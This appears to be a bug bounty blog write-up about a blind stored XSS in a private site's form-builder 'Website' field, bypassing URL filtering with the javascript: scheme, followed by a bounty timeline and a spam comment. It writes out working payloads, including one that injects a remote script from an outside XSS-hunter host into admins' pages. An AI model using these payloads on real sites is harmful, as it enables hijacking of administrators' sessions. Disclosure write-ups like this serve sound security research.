Hello Pentesters,

I’m Youssef A. Mohamed aka GeneralEG

Today I’m gonna share a juicy finding with you.

Talking about bypassing couple of filters to execute malicious javascript codes easily and achieve a Blind Stored XSS.

“I found this issue in alot of targets so i will take one of these programs as an example.”

The program is private so let’s call it redacted.com

  • Recently i was testing in this program and after some recon i found that the website offer a specific service (Create Forms).

How this service work?
1)Creator User create form
2)Creator User share the link with visitor
3)Visitor fill the form
4)The filled information will be available for the Form’s Creator at redacted.com/manager/{Form ID}/

So while testing the “Creating form” functions, I’ve found that there’s a Website input

I made a simple form.

 

Then opened as the form as a visitor.

At the first i tried to bypass it as the basic style:
(thought that if i wrote website.com?”payload it will executed)

So i entered:
https://example.com/?”%22"

( ” + url encoded + html entities encoded)

Then opened the creator account to see what happened.

But unfortunately the filter encoded the double quotes.
https://example.com"%22"

and noticed that the Link rendered in (a tag)

 

So i decided to a grab a cup of coffee :”D

  • After few minutes of deep thinking while drinking my coffee about how i will bypass this one.

I decided to start fuzzing in this input specially.. {Enter Website}

While I’m fuzzing i noticed that the filter accepted test:https://example.com !

then tried javascript:https//evil.com
and it worked 😀
“Evil loud laugh”

  • Now I’m sure that there’s XSS here
    but it’s need real website merged with my payload so i wrote this one.

javascript:x=’http://x.c’;alert(‘xss’);//

Finally executed!

  • But wait we want to make it Blind XSS to attack the real admins (The best scenario).

So the last payload was:

javascript:eval(‘a=document.createElement(\’script\’);a.src=\’https://generaleg.xss.ht\’;document.body.appendChild(a)’);s=’https://s.com’

 

¯\_(ツ)_/¯

That’s it!

 

Notes:

  •  80% of my targets which have Website’s input was vulnerable to the same scenario.
  •  To make sure that your target is vulnerable to the same problem you need few steps to make sure:

A. Check if the website is accepting other URI scheme like javascript:https://generaleg0x01.com or not?

B. Check if the website is rendering your https://generaleg0x01.com on HTML ‘a’ tag or not?

  • And in the most similar situations the same payload will work perfectly.

Timeline:
20 December, 2018: Report Submitted
25 December, 2018: Report Reviewed and Triaged
30 December, 2018: Report Resolved & 800$ Bounty Awarded

Learned lessons:

  •  Fuzz as much as you can.
  •  Don’t try one technique to bypass the filter try another techniques.

 

A minute please!

Building a website, an application or any kind of business? Or already have one? Worried about your security? Contact me before going public and let me protect your business!

6 thoughts on “Hack Your Form – New vector for Blind XSS”

  1. Hi there I am so excited I found your blog page, I really found you by error, while I was searching on Askjeeve for something else, Anyways
    I am here now and would just like to say thanks for a
    remarkable post and a all round entertaining blog (I also
    love the theme/design), I don’t have time to read it all at the moment but I
    have saved it and also included your RSS feeds, so when I have time
    I will be back to read more, Please do keep up the excellent work.

Leave a Reply to Back Pain in Early Pregnancy Cancel reply

Your email address will not be published. Required fields are marked *